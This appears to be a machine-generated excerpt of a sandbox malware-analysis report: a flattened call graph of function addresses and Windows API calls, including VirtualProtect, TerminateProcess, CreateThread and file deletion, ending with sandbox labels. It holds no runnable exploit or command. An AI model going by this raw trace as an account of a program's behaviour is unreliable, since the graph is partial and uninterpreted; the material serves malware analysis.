WriteFile 110019->110023 110020->109988 110020->110019 110021->109993 110021->110015 110021->110017 110021->110018 110021->110019 110022->110019 110023->109988 110023->110019 110024->109932 110025->109945 110026->109948 110027->109947 110028->109945 110029->109936 110030->109940 110031->109945 110032->109898 110033->109900 110056 abb957 110034->110056 110036 abf8b0 110069 abb8d1 48 API calls 2 library calls 110036->110069 110038 abf85a 110038->110036 110039 abf88e 110038->110039 110041 abb957 __close_nolock 47 API calls 110038->110041 110039->110036 110042 abb957 __close_nolock 47 API calls 110039->110042 110040 abf8b8 110043 abf8da 110040->110043 110070 ab887d 47 API calls 2 library calls 110040->110070 110044 abf885 110041->110044 110045 abf89a CloseHandle 110042->110045 110043->109922 110047 abb957 __close_nolock 47 API calls 110044->110047 110045->110036 110048 abf8a6 GetLastError 110045->110048 110047->110039 110048->110036 110049->109907 110050->109920 110051->109922 110052->109920 110053->109911 110054->109914 110055->109920 110057 abb962 110056->110057 110058 abb977 110056->110058 110059 ab886a __dosmaperr 47 API calls 110057->110059 110061 ab886a __dosmaperr 47 API calls 110058->110061 110063 abb99c 110058->110063 110060 abb967 110059->110060 110062 ab889e _xtow_s@20 47 API calls 110060->110062 110064 abb9a6 110061->110064 110065 abb96f 110062->110065 110063->110038 110066 ab889e _xtow_s@20 47 API calls 110064->110066 110065->110038 110067 abb9ae 110066->110067 110068 ab7aa0 _xtow_s@20 8 API calls 110067->110068 110068->110065 110069->110040 110070->110043 110071->109512 110072->109516 110073->109529 110074->109531 110075->109528 110076->109544 110077->109540 110079 b04aa5 GetFullPathNameW 110078->110079 110080 a931c7 110078->110080 110082 b04abd 110079->110082 110135 a93bcf 110080->110135 110083 a931cd GetFullPathNameW 110084 a931e7 110083->110084 110084->109371 110086 a93a8b SHGetDesktopFolder 110085->110086 110089 a93ade 110085->110089 110087 a93a99 110086->110087 110086->110089 110088 a93ac8 SHGetPathFromIDListW 110087->110088 110087->110089 110088->110089 110089->109374 110094 a93ba9 110090->110094 110098 a93b72 110090->110098 110091 ab1bc7 _W_store_winword 59 API calls 110091->110094 110092 a93bcf 48 API calls 110093 a93b7d 110092->110093 110139 a9197e 110093->110139 110094->110091 110096 b033e5 110094->110096 110094->110098 110098->110092 110099 a9197e 48 API calls 110100 a93b9f 110099->110100 110101 a93dcb 110100->110101 110102 a93f9b 136 API calls 110101->110102 110103 a93def 110102->110103 110104 b039f9 110103->110104 110106 a93f9b 136 API calls 110103->110106 110105 adcc82 122 API calls 110104->110105 110107 b03a0e 110105->110107 110108 a93e02 110106->110108 110109 b03a12 110107->110109 110110 b03a2f 110107->110110 110108->110104 110111 a93e0a 110108->110111 110112 a93e39 84 API calls 110109->110112 110113 ab010a 48 API calls 110110->110113 110114 b03a1a 110111->110114 110115 a93e16 110111->110115 110112->110114 110125 b03a74 Mailbox 110113->110125 110161 ad757b 87 API calls _wprintf 110114->110161 110160 a9bdf0 163 API calls 8 library calls 110115->110160 110118 b03a28 110118->110110 110119 a93e2e 110119->109372 110120 b03c24 110121 ab28ca _free 47 API calls 110120->110121 110122 b03c2c 110121->110122 110123 a93e39 84 API calls 110122->110123 110129 b03c35 110123->110129 110125->110120 110125->110129 110132 a9caee 48 API calls 110125->110132 110145 a9b6d0 110125->110145 110154 a9a870 110125->110154 110162 ad30ac 48 API calls _memmove 110125->110162 110163 ad2fcd 60 API calls 2 library calls 110125->110163 110164 ada525 48 API calls 110125->110164 110128 ab28ca _free 47 API calls 110128->110129 110129->110128 110131 a93e39 84 API calls 110129->110131 110165 ad32b0 86 API calls 4 library calls 110129->110165 110131->110129 110132->110125 110136 a93bd9 __wsetenvp 110135->110136 110137 ab010a 48 API calls 110136->110137 110138 a93bee _wcscpy 110137->110138 110138->110083 110140 a91990 110139->110140 110144 a919af _memmove 110139->110144 110142 ab010a 48 API calls 110140->110142 110141 ab010a 48 API calls 110143 a919c6 110141->110143 110142->110144 110143->110099 110144->110141 110146 a9b789 110145->110146 110149 a9b6e3 _memmove 110145->110149 110148 ab010a 48 API calls 110146->110148 110147 ab010a 48 API calls 110150 a9b6ea 110147->110150 110148->110149 110149->110147 110151 a9b71b 110150->110151 110152 ab010a 48 API calls 110150->110152 110151->110125 110153 a9b74d 110152->110153 110153->110125 110155 a9a93d 110154->110155 110156 a9a883 110154->110156 110155->110125 110156->110155 110157 ab010a 48 API calls 110156->110157 110159 a9a8c1 110156->110159 110157->110159 110158 ab010a 48 API calls 110158->110159 110159->110155 110159->110158 110160->110119 110161->110118 110162->110125 110163->110125 110164->110125 110165->110129 110167 a9a72c 110166->110167 110172 a9a848 110166->110172 110168 ab010a 48 API calls 110167->110168 110167->110172 110169 a9a753 110168->110169 110170 ab010a 48 API calls 110169->110170 110176 a9a7c5 110170->110176 110172->109380 110174 a9a870 48 API calls 110174->110176 110175 a9b6d0 48 API calls 110175->110176 110176->110172 110176->110174 110176->110175 110179 a9ace0 91 API calls 2 library calls 110176->110179 110180 ada3ee 48 API calls 110176->110180 110177->109383 110178->109385 110179->110176 110180->110176 110182 b04ad8 EnumResourceNamesW 110181->110182 110183 a931a2 LoadImageW 110181->110183 110184 a93118 RegisterClassExW 110182->110184 110183->110184 110185 a92f58 GetSysColorBrush RegisterClassExW RegisterWindowMessageW 110184->110185 110186 a92fe9 ImageList_Create LoadIconW ImageList_ReplaceIcon 110185->110186 110186->109399 110188 b044d1 110187->110188 110189 a93618 110187->110189 110188->110189 110190 b044da DestroyIcon 110188->110190 110189->109409 110213 ad6237 61 API calls _W_store_winword 110189->110213 110190->110189 110192 a93900 110191->110192 110212 a939d5 Mailbox 110191->110212 110214 a97b6e 110192->110214 110195 a9391b 110197 a97e53 48 API calls 110195->110197 110196 b0453f LoadStringW 110198 b04559 110196->110198 110199 a93930 110197->110199 110220 a939e8 48 API calls 2 library calls 110198->110220 110199->110198 110200 a93941 110199->110200 110202 a9394b 110200->110202 110203 a939da 110200->110203 110219 a939e8 48 API calls 2 library calls 110202->110219 110206 a9c935 48 API calls 110203->110206 110204 b04564 110207 b04578 110204->110207 110210 a93956 _memset _wcscpy 110204->110210 110206->110210 110221 a939e8 48 API calls 2 library calls 110207->110221 110209 b04586 110211 a939ba Shell_NotifyIconW 110210->110211 110211->110212 110212->109410 110213->109409 110215 ab010a 48 API calls 110214->110215 110216 a97b93 110215->110216 110217 a9a6f8 48 API calls 110216->110217 110218 a9390e 110217->110218 110218->110195 110218->110196 110219->110210 110220->110204 110221->110209 110223 a9e7fd 110222->110223 110224 a9e80f 110222->110224 110348 a9dcd0 346 API calls 2 library calls 110223->110348 110349 add520 86 API calls 4 library calls 110224->110349 110226 a9e806 110226->109447 110228 b098e8 110228->110228 110230 a9ea20 110229->110230 110231 a9fa40 346 API calls 110230->110231 110234 a9ea89 110230->110234 110232 b09919 110231->110232 110232->110234 110350 add520 86 API calls 4 library calls 110232->110350 110233 b099bc 110353 add520 86 API calls 4 library calls 110233->110353 110239 a9d3d2 48 API calls 110234->110239 110252 a9ecd7 Mailbox 110234->110252 110253 a9eb18 110234->110253 110237 a9d3d2 48 API calls 110238 b09997 110237->110238 110352 ab1b2a 52 API calls __cinit 110238->110352 110241 b09963 110239->110241 110351 ab1b2a 52 API calls __cinit 110241->110351 110242 a9d380 55 API calls 110242->110252 110244 b09d70 110362 aee2fb 346 API calls Mailbox 110244->110362 110246 b09e49 110367 add520 86 API calls 4 library calls 110246->110367 110247 a9fa40 346 API calls 110247->110252 110248 add520 86 API calls 110248->110252 110249 b09dc2 110364 add520 86 API calls 4 library calls 110249->110364 110250 b09ddf 110365 aec235 346 API calls Mailbox 110250->110365 110252->110233 110252->110242 110252->110244 110252->110246 110252->110247 110252->110248 110252->110249 110252->110250 110256 a9342c 48 API calls 110252->110256 110261 aa14a0 48 API calls 110252->110261 110262 a9ef0c Mailbox 110252->110262 110263 a9f56f 110252->110263 110266 a9d805 48 API calls 110252->110266 110267 b09a3c 110252->110267 110354 ada3ee 48 API calls 110252->110354 110355 aeede9 346 API calls 110252->110355 110360 aca599 InterlockedDecrement 110252->110360 110361 aef4df 346 API calls 110252->110361 110253->110237 110253->110252 110256->110252 110260 b09df7 110260->110262 110366 add520 86 API calls 4 library calls 110260->110366 110261->110252 110262->109447 110263->110262 110363 add520 86 API calls 4 library calls 110263->110363 110266->110252 110356 aed154 48 API calls 110267->110356 110269 b09a48 110271 b09a56 110269->110271 110272 b09a9b 110269->110272 110357 ada485 48 API calls 110271->110357 110275 b09a91 Mailbox 110272->110275 110358 adafce 48 API calls 110272->110358 110273 a9fa40 346 API calls 110273->110262 110275->110273 110277 b09ad8 110359 aadf08 48 API calls 110277->110359 110280 aa469f 110279->110280 110281 aa4537 110279->110281 110284 a9caee 48 API calls 110280->110284 110282 b07820 110281->110282 110283 aa4543 110281->110283 110416 aee713 346 API calls Mailbox 110282->110416 110415 aa4040 346 API calls _memmove 110283->110415 110291 aa45e4 Mailbox 110284->110291 110287 aa4639 Mailbox 110287->109447 110288 b0782c 110288->110287 110417 add520 86 API calls 4 library calls 110288->110417 110290 aa4559 110290->110287 110290->110288 110290->110291 110368 ae01e4 110291->110368 110409 aadd84 110291->110409 110412 af0bfa 110291->110412 110295->109447 110296->109447 110297->109447 110298->109447 110299->109416 110300->109419 110301->109424 110302->109447 110303->109447 110304->109445 110305->109445 110306->109445 110308 a9fa60 110307->110308 110344 a9fa8e Mailbox _memmove 110307->110344 110309 ab010a 48 API calls 110308->110309 110309->110344 110310 aa105e 110311 a9c935 48 API calls 110310->110311 110336 a9fbf1 Mailbox 110311->110336 110312 ab010a 48 API calls 110312->110344 110313 aa0119 110650 add520 86 API calls 4 library calls 110313->110650 110316 a9c935 48 API calls 110316->110344 110318 aa0dee 110640 a9d89e 50 API calls Mailbox 110318->110640 110319 ab1b2a 52 API calls __cinit 110319->110344 110320 aa1063 110649 add520 86 API calls 4 library calls 110320->110649 110322 b0b772 110651 add520 86 API calls 4 library calls 110322->110651 110323 aa0dfa 110641 a9d89e 50 API calls Mailbox 110323->110641 110327 aa0e83 110331 a9caee 48 API calls 110327->110331 110328 a9d3d2 48 API calls 110328->110344 110330 b0b7d2 110339 aa10f1 Mailbox 110331->110339 110333 aa1230 110333->110336 110648 add520 86 API calls 4 library calls 110333->110648 110336->109447 110337 a9fa40 346 API calls 110337->110344 110647 add520 86 API calls 4 library calls 110339->110647 110341 b0b583 110646 add520 86 API calls 4 library calls 110341->110646 110342 aca599 InterlockedDecrement 110342->110344 110344->110310 110344->110312 110344->110313 110344->110316 110344->110318 110344->110319 110344->110320 110344->110322 110344->110323 110344->110327 110344->110328 110344->110333 110344->110336 110344->110337 110344->110339 110344->110341 110344->110342 110638 a9f6d0 346 API calls 2 library calls 110344->110638 110639 aa1620 59 API calls Mailbox 110344->110639 110642 aeee52 82 API calls 2 library calls 110344->110642 110643 aeef9d 90 API calls Mailbox 110344->110643 110644 adb020 48 API calls 110344->110644 110645 aee713 346 API calls Mailbox 110344->110645 110345->109445 110346->109445 110347->109445 110348->110226 110349->110228 110350->110234 110351->110253 110352->110252 110353->110262 110354->110252 110355->110252 110356->110269 110357->110275 110358->110277 110359->110275 110360->110252 110361->110252 110362->110263 110363->110262 110364->110262 110365->110260 110366->110262 110367->110262 110369 ae020d 110368->110369 110370 ae0218 110368->110370 110482 a9cdb4 48 API calls 110369->110482 110372 a984a6 81 API calls 110370->110372 110373 ae0232 110372->110373 110374 ae0366 110373->110374 110375 ae033c 110373->110375 110376 ae0254 110373->110376 110374->110287 110377 a93f9b 136 API calls 110375->110377 110378 a984a6 81 API calls 110376->110378 110379 ae034d 110377->110379 110383 ae0260 _wcscpy _wcschr 110378->110383 110380 ae0362 110379->110380 110381 a93f9b 136 API calls 110379->110381 110380->110374 110382 a984a6 81 API calls 110380->110382 110381->110380 110384 ae039b 110382->110384 110388 ae0284 _wcscat _wcscpy 110383->110388 110392 ae02b2 _wcscat 110383->110392 110418 ab297d 110384->110418 110386 a984a6 81 API calls 110387 ae02d0 _wcscpy 110386->110387 110483 ad7c0c GetFileAttributesW 110387->110483 110390 a984a6 81 API calls 110388->110390 110390->110392 110391 ae02f0 __wsetenvp 110391->110374 110394 a984a6 81 API calls 110391->110394 110392->110386 110393 ae03bf _wcscat _wcscpy 110397 a984a6 81 API calls 110393->110397 110395 ae031c 110394->110395 110484 ad6b3f 77 API calls 4 library calls 110395->110484 110399 ae0456 110397->110399 110398 ae0330 110398->110374 110421 ad7334 110399->110421 110401 ae0476 110402 aadd84 3 API calls 110401->110402 110403 ae0485 110402->110403 110404 a984a6 81 API calls 110403->110404 110407 ae04b6 110403->110407 110405 ae049f 110404->110405 110427 adc890 110405->110427 110408 a93e39 84 API calls 110407->110408 110408->110374 110547 aadd92 GetFileAttributesW 110409->110547 110552 aef79f 110412->110552 110414 af0c0a 110414->110287 110415->110290 110416->110288 110417->110287 110485 ab29c7 110418->110485 110422 ad7341 _wcschr __ftell_nolock 110421->110422 110423 ab297d __wsplitpath 47 API calls 110422->110423 110426 ad7357 _wcscat _wcscpy 110422->110426 110424 ad7389 110423->110424 110425 ab297d __wsplitpath 47 API calls 110424->110425 110425->110426 110426->110401 110428 adc89d __ftell_nolock 110427->110428 110429 ab010a 48 API calls 110428->110429 110430 adc8fa 110429->110430 110431 a94bce 48 API calls 110430->110431 110432 adc904 110431->110432 110433 adc6a0 GetSystemTimeAsFileTime 110432->110433 110434 adc90f 110433->110434 110435 a941a7 83 API calls 110434->110435 110436 adc922 _wcscmp 110435->110436 110437 adc946 110436->110437 110438 adc9f3 110436->110438 110439 adce59 94 API calls 110437->110439 110440 adce59 94 API calls 110438->110440 110441 adc94b 110439->110441 110455 adc9bf _wcscat 110440->110455 110442 ab297d __wsplitpath 47 API calls 110441->110442 110445 adc9fc 110441->110445 110447 adc974 _wcscat _wcscpy 110442->110447 110443 a9417d 64 API calls 110444 adca18 110443->110444 110446 a9417d 64 API calls 110444->110446 110445->110407 110448 adca28 110446->110448 110450 ab297d __wsplitpath 47 API calls 110447->110450 110449 a9417d 64 API calls 110448->110449 110451 adca43 110449->110451 110450->110455 110452 a9417d 64 API calls 110451->110452 110453 adca53 110452->110453 110454 a9417d 64 API calls 110453->110454 110456 adca6e 110454->110456 110455->110443 110455->110445 110457 a9417d 64 API calls 110456->110457 110458 adca7e 110457->110458 110459 a9417d 64 API calls 110458->110459 110460 adca8e 110459->110460 110461 a9417d 64 API calls 110460->110461 110462 adca9e 110461->110462 110511 add009 GetTempPathW GetTempFileNameW 110462->110511 110464 adcaaa 110465 ab4129 117 API calls 110464->110465 110474 adcabb 110465->110474 110466 ab4274 __fcloseall 83 API calls 110467 adcb80 110466->110467 110469 adcb9a 110467->110469 110470 adcb86 DeleteFileW 110467->110470 110468 a9417d 64 API calls 110468->110474 110471 adcc2e CopyFileW 110469->110471 110476 adcba4 110469->110476 110470->110445 110472 adcc44 DeleteFileW 110471->110472 110473 adcc56 DeleteFileW 110471->110473 110472->110445 110525 adcfc8 CreateFileW 110473->110525 110474->110445 110474->110468 110480 adcb75 110474->110480 110512 ab373e 110474->110512 110528 adc251 118 API calls __fcloseall 110476->110528 110479 adcc19 110479->110473 110481 adcc1d DeleteFileW 110479->110481 110480->110466 110481->110445 110482->110370 110483->110391 110484->110398 110486 ab29e2 110485->110486 110489 ab29d6 110485->110489 110509 ab889e 47 API calls __getptd_noexit 110486->110509 110488 ab2b9a 110495 ab29c2 110488->110495 110510 ab7aa0 8 API calls _xtow_s@20 110488->110510 110489->110486 110491 ab2a55 110489->110491 110504 aba9fb 47 API calls _xtow_s@20 110489->110504 110491->110486 110499 ab2ac2 110491->110499 110505 aba9fb 47 API calls _xtow_s@20 110491->110505 110493 ab2b21 110493->110486 110494 ab2b31 110493->110494 110493->110495 110508 aba9fb 47 API calls _xtow_s@20 110494->110508 110495->110393 110496 ab2afc 110496->110486 110496->110495 110501 ab2b12 110496->110501 110497 ab2ae0 110497->110486 110497->110496 110506 aba9fb 47 API calls _xtow_s@20 110497->110506 110499->110493 110499->110497 110507 aba9fb 47 API calls _xtow_s@20 110501->110507 110504->110491 110505->110499 110506->110496 110507->110495 110508->110495 110509->110488 110510->110495 110511->110464 110513 ab374a __tzset_nolock 110512->110513 110514 ab377c 110513->110514 110515 ab3764 110513->110515 110517 ab3774 __tzset_nolock 110513->110517 110518 ab5a9f __lock_file 48 API calls 110514->110518 110541 ab889e 47 API calls __getptd_noexit 110515->110541 110517->110474 110519 ab3782 110518->110519 110529 ab35e7 110519->110529 110520 ab3769 110542 ab7aa0 8 API calls _xtow_s@20 110520->110542 110526 adcfee SetFileTime CloseHandle 110525->110526 110527 add004 110525->110527 110526->110527 110527->110445 110528->110479 110530 ab35f6 110529->110530 110535 ab3614 110529->110535 110531 ab3604 110530->110531 110530->110535 110539 ab362c _memmove 110530->110539 110544 ab889e 47 API calls __getptd_noexit 110531->110544 110533 ab3609 110545 ab7aa0 8 API calls _xtow_s@20 110533->110545 110543 ab37b4 LeaveCriticalSection LeaveCriticalSection _fseek 110535->110543 110537 ab3914 __flush 78 API calls 110537->110539 110538 ab35c3 __fputwc_nolock 47 API calls 110538->110539 110539->110535 110539->110537 110539->110538 110540 abbd14 __flush 78 API calls 110539->110540 110546 ab9af3 78 API calls 6 library calls 110539->110546 110540->110539 110541->110520 110542->110517 110543->110517 110544->110533 110545->110535 110546->110539 110548 aadd89 110547->110548 110549 b04a7d FindFirstFileW 110547->110549 110548->110287 110550 b04a95 FindClose 110549->110550 110551 b04a8e 110549->110551 110551->110550 110553 a984a6 81 API calls 110552->110553 110554 aef7db 110553->110554 110577 aef81d Mailbox 110554->110577 110588 af0458 110554->110588 110556 aefa7c 110557 aefbeb 110556->110557 110563 aefa86 110556->110563 110624 af0579 89 API calls Mailbox 110557->110624 110560 aefbf8 110562 aefc04 110560->110562 110560->110563 110561 a984a6 81 API calls 110573 aef875 Mailbox 110561->110573 110562->110577 110601 aef5fb 110563->110601 110568 aefaba 110615 aaf92c 110568->110615 110571 aefaee 110575 a93320 48 API calls 110571->110575 110572 aefad4 110621 add520 86 API calls 4 library calls 110572->110621 110573->110556 110573->110561 110573->110577 110619 af28d9 48 API calls _memmove 110573->110619 110620 aefc96 60 API calls 2 library calls 110573->110620 110578 aefb05 110575->110578 110576 aefadf GetCurrentProcess TerminateProcess 110576->110571 110577->110414 110579 aa14a0 48 API calls 110578->110579 110587 aefb2f 110578->110587 110580 aefb1e 110579->110580 110622 af0300 105 API calls _free 110580->110622 110581 aa14a0 48 API calls 110581->110587 110582 aefc56 110582->110577 110584 aefc6f FreeLibrary 110582->110584 110584->110577 110587->110581 110587->110582 110623 a9d89e 50 API calls Mailbox 110587->110623 110625 af0300 105 API calls _free 110587->110625 110589 a9b8a7 48 API calls 110588->110589 110590 af0473 CharLowerBuffW 110589->110590 110626 ae267a 110590->110626 110594 a9d3d2 48 API calls 110595 af04ac 110594->110595 110633 a97f40 48 API calls _memmove 110595->110633 110597 af04c3 110598 a9a2fb 48 API calls 110597->110598 110599 af04cf Mailbox 110598->110599 110600 af050b Mailbox 110599->110600 110634 aefc96 60 API calls 2 library calls 110599->110634 110600->110573 110602 aef616 110601->110602 110606 aef66b 110601->110606 110603 ab010a 48 API calls 110602->110603 110604 aef638 110603->110604 110605 ab010a 48 API calls 110604->110605 110604->110606 110605->110604 110607 af0719 110606->110607 110608 af0944 Mailbox 110607->110608 110614 af073c _strcat _wcscpy __wsetenvp 110607->110614 110608->110568 110609 a9d00b 58 API calls 110609->110614 110610 a9cdb4 48 API calls 110610->110614 110611 a984a6 81 API calls 110611->110614 110612 ab45ec 47 API calls std::exception::_Copy_str 110612->110614 110614->110608 110614->110609 110614->110610 110614->110611 110614->110612 110637 ad8932 50 API calls __wsetenvp 110614->110637 110617 aaf941 110615->110617 110616 aaf9d9 VirtualProtect 110618 aaf9a7 110616->110618 110617->110616 110617->110618 110618->110571 110618->110572 110619->110573 110620->110573 110621->110576 110622->110587 110623->110587 110624->110560 110625->110587 110627 ae26a4 __wsetenvp 110626->110627 110628 ae26e2 110627->110628 110629 ae26d8 110627->110629 110632 ae2763 110627->110632 110628->110594 110628->110599 110629->110628 110635 aadfd2 60 API calls 110629->110635 110632->110628 110636 aadfd2 60 API calls 110632->110636 110633->110597 110634->110600 110635->110629 110636->110632 110637->110614 110638->110344 110639->110344 110640->110323 110641->110327 110642->110344 110643->110344 110644->110344 110645->110344 110646->110339 110647->110336 110648->110320 110649->110313 110650->110322 110651->110330 110652 b01e8b 110657 aae44f 110652->110657 110656 b01e9a 110658 ab010a 48 API calls 110657->110658 110659 aae457 110658->110659 110660 aae46b 110659->110660 110665 aae74b 110659->110665 110664 ab1b2a 52 API calls __cinit 110660->110664 110664->110656 110666 aae754 110665->110666 110668 aae463 110665->110668 110697 ab1b2a 52 API calls __cinit 110666->110697 110669 aae47b 110668->110669 110670 a9d3d2 48 API calls 110669->110670 110671 aae492 GetVersionExW 110670->110671 110672 a97e53 48 API calls 110671->110672 110673 aae4d5 110672->110673 110698 aae5f8 110673->110698 110678 b029f9 110681 aae55f GetCurrentProcess 110715 aae70e LoadLibraryA GetProcAddress 110681->110715 110682 aae576 110684 aae59e 110682->110684 110685 aae5ec GetSystemInfo 110682->110685 110709 aae694 110684->110709 110686 aae5c9 110685->110686 110688 aae5dc 110686->110688 110689 aae5d7 FreeLibrary 110686->110689 110688->110660 110689->110688 110691 aae5e4 GetSystemInfo 110693 aae5be 110691->110693 110692 aae5b4 110712 aae437 110692->110712 110693->110686 110696 aae5c4 FreeLibrary 110693->110696 110696->110686 110697->110668 110699 aae601 110698->110699 110700 a9a2fb 48 API calls 110699->110700 110701 aae4dd 110700->110701 110702 aae617 110701->110702 110703 aae625 110702->110703 110704 a9a2fb 48 API calls 110703->110704 110705 aae4e9 110704->110705 110705->110678 110706 aae6d1 110705->110706 110716 aae6e3 110706->110716 110720 aae6a6 110709->110720 110713 aae694 2 API calls 110712->110713 110714 aae43f GetNativeSystemInfo 110713->110714 110714->110693 110715->110682 110717 aae55b 110716->110717 110718 aae6ec LoadLibraryA 110716->110718 110717->110681 110717->110682 110718->110717 110719 aae6fd GetProcAddress 110718->110719 110719->110717 110721 aae5ac 110720->110721 110722 aae6af LoadLibraryA 110720->110722 110721->110691 110721->110692 110722->110721 110723 aae6c0 GetProcAddress 110722->110723 110723->110721 110724 b01edb 110729 a9131c 110724->110729 110726 b01ee1 110762 ab1b2a 52 API calls __cinit 110726->110762 110728 b01eeb 110730 a9133e 110729->110730 110763 a91624 110730->110763 110735 a9d3d2 48 API calls 110736 a9137e 110735->110736 110737 a9d3d2 48 API calls 110736->110737 110738 a91388 110737->110738 110739 a9d3d2 48 API calls 110738->110739 110740 a91392 110739->110740 110741 a9d3d2 48 API calls 110740->110741 110742 a913d8 110741->110742 110743 a9d3d2 48 API calls 110742->110743 110744 a914bb 110743->110744 110771 a91673 110744->110771 110748 a914eb 110749 a9d3d2 48 API calls 110748->110749 110750 a914f5 110749->110750 110800 a9175e 110750->110800 110752 a91540 110753 a91550 GetStdHandle 110752->110753 110754 a915ab 110753->110754 110755 b058da 110753->110755 110756 a915b1 CoInitialize 110754->110756 110755->110754 110757 b058e3 110755->110757 110756->110726 110807 ad9bd1 53 API calls 110757->110807 110759 b058ea 110808 ada2f6 CreateThread 110759->110808 110761 b058f6 CloseHandle 110761->110756 110762->110728 110809 a917e0 110763->110809 110766 a97e53 48 API calls 110767 a91344 110766->110767 110768 a916db 110767->110768 110823 a91867 6 API calls 110768->110823 110770 a91374 110770->110735 110772 a9d3d2 48 API calls 110771->110772 110773 a91683 110772->110773 110774 a9d3d2 48 API calls 110773->110774 110775 a9168b 110774->110775 110824 a97d70 110775->110824 110778 a97d70 48 API calls 110779 a9169b 110778->110779 110780 a9d3d2 48 API calls 110779->110780 110781 a916a6 110780->110781 110782 ab010a 48 API calls 110781->110782 110783 a914c5 110782->110783 110784 a916f2 110783->110784 110785 a91700 110784->110785 110786 a9d3d2 48 API calls 110785->110786 110787 a9170b 110786->110787 110788 a9d3d2 48 API calls 110787->110788 110789 a91716 110788->110789 110790 a9d3d2 48 API calls 110789->110790 110791 a91721 110790->110791 110792 a9d3d2 48 API calls 110791->110792 110793 a9172c 110792->110793 110794 a97d70 48 API calls 110793->110794 110795 a91737 110794->110795 110796 ab010a 48 API calls 110795->110796 110797 a9173e 110796->110797 110798 b024a6 110797->110798 110799 a91747 RegisterWindowMessageW 110797->110799 110799->110748 110801 a9176e 110800->110801 110802 b067dd 110800->110802 110804 ab010a 48 API calls 110801->110804 110829 add231 50 API calls 110802->110829 110806 a91776 110804->110806 110805 b067e8 110806->110752 110807->110759 110808->110761 110830 ada2dc 54 API calls 110808->110830 110816 a917fc 110809->110816 110812 a917fc 48 API calls 110813 a917f0 110812->110813 110814 a9d3d2 48 API calls 110813->110814 110815 a9165b 110814->110815 110815->110766 110817 a9d3d2 48 API calls 110816->110817 110818 a91807 110817->110818 110819 a9d3d2 48 API calls 110818->110819 110820 a9180f 110819->110820 110821 a9d3d2 48 API calls 110820->110821 110822 a917e8 110821->110822 110822->110812 110823->110770 110825 a9d3d2 48 API calls 110824->110825 110826 a97d79 110825->110826 110827 a9d3d2 48 API calls 110826->110827 110828 a91693 110827->110828 110828->110778 110829->110805 110831 a929c2 110832 a929cb 110831->110832 110833 a92a46 110832->110833 110834 a929e9 110832->110834 110835 a92a48 110832->110835 110836 a92a2b DefWindowProcW 110833->110836 110839 a92aac PostQuitMessage 110834->110839 110840 a929f6 110834->110840 110837 b02307 110835->110837 110838 a92a4e 110835->110838 110843 a92a39 110836->110843 110880 a9322e 16 API calls 110837->110880 110844 a92a53 110838->110844 110845 a92a76 SetTimer RegisterWindowMessageW 110838->110845 110839->110843 110841 a92a01 110840->110841 110842 b0238f 110840->110842 110848 a92a09 110841->110848 110849 a92ab6 110841->110849 110885 ad57fb 60 API calls _memset 110842->110885 110852 a92a5a KillTimer 110844->110852 110853 b022aa 110844->110853 110845->110843 110850 a92a9f CreatePopupMenu 110845->110850 110847 b0232e 110881 aaec33 346 API calls Mailbox 110847->110881 110855 b02374 110848->110855 110856 a92a14 110848->110856 110878 a91e58 53 API calls _memset 110849->110878 110850->110843 110876 a92b94 Shell_NotifyIconW _memset 110852->110876 110859 b022e3 MoveWindow 110853->110859 110860 b022af 110853->110860 110855->110836 110884 acb31f 48 API calls 110855->110884 110862 a92a1f 110856->110862 110863 b0235f 110856->110863 110857 b023a1 110857->110836 110857->110843 110859->110843 110865 b022d2 SetFocus 110860->110865 110866 b022b3 110860->110866 110862->110836 110882 a92b94 Shell_NotifyIconW _memset 110862->110882 110883 ad5fdb 70 API calls _memset 110863->110883 110864 a92ac5 110864->110843 110865->110843 110866->110862 110868 b022bc 110866->110868 110867 a92a6d 110877 a92ac7 DeleteObject DestroyWindow Mailbox 110867->110877 110879 a9322e 16 API calls 110868->110879 110874 b02353 110875 a93598 67 API calls 110874->110875 110875->110833 110876->110867 110877->110843 110878->110864 110879->110843 110880->110847 110881->110862 110882->110874 110883->110864 110884->110833 110885->110857 110886 b01eed 110891 aae975 110886->110891 110888 b01f01 110907 ab1b2a 52 API calls __cinit 110888->110907 110890 b01f0b 110892 ab010a 48 API calls 110891->110892 110893 aaea27 GetModuleFileNameW 110892->110893 110894 ab297d __wsplitpath 47 API calls 110893->110894 110895 aaea5b _wcsncat 110894->110895 110908 ab2bff 110895->110908 110898 ab010a 48 API calls 110899 aaea94 _wcscpy 110898->110899 110900 a9d3d2 48 API calls 110899->110900 110901 aaeacf 110900->110901 110911 aaeb05 110901->110911 110903 aaeae0 Mailbox 110903->110888 110904 a9a4f6 48 API calls 110906 aaeada _wcscat __wsetenvp _wcsncpy 110904->110906 110905 ab010a 48 API calls 110905->110906 110906->110903 110906->110904 110906->110905 110907->110890 110925 abaab9 110908->110925 110937 a9c4cd 110911->110937 110913 aaeb14 RegOpenKeyExW 110914 b04b17 RegQueryValueExW 110913->110914 110915 aaeb35 110913->110915 110916 b04b30 110914->110916 110917 b04b91 RegCloseKey 110914->110917 110915->110906 110918 ab010a 48 API calls 110916->110918 110919 b04b49 110918->110919 110920 a94bce 48 API calls 110919->110920 110921 b04b53 RegQueryValueExW 110920->110921 110922 b04b86 110921->110922 110923 b04b6f 110921->110923 110922->110917 110924 a97e53 48 API calls 110923->110924 110924->110922 110926 abaaca 110925->110926 110927 ababc6 110925->110927 110926->110927 110933 abaad5 110926->110933 110935 ab889e 47 API calls __getptd_noexit 110927->110935 110929 ababbb 110936 ab7aa0 8 API calls _xtow_s@20 110929->110936 110931 aaea8a 110931->110898 110933->110931 110934 ab889e 47 API calls __getptd_noexit 110933->110934 110934->110929 110935->110929 110936->110931 110938 a9c4da 110937->110938 110939 a9c4e7 110937->110939 110938->110913 110940 ab010a 48 API calls 110939->110940 110940->110938

                      Executed Functions

                      Function 00ABBDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
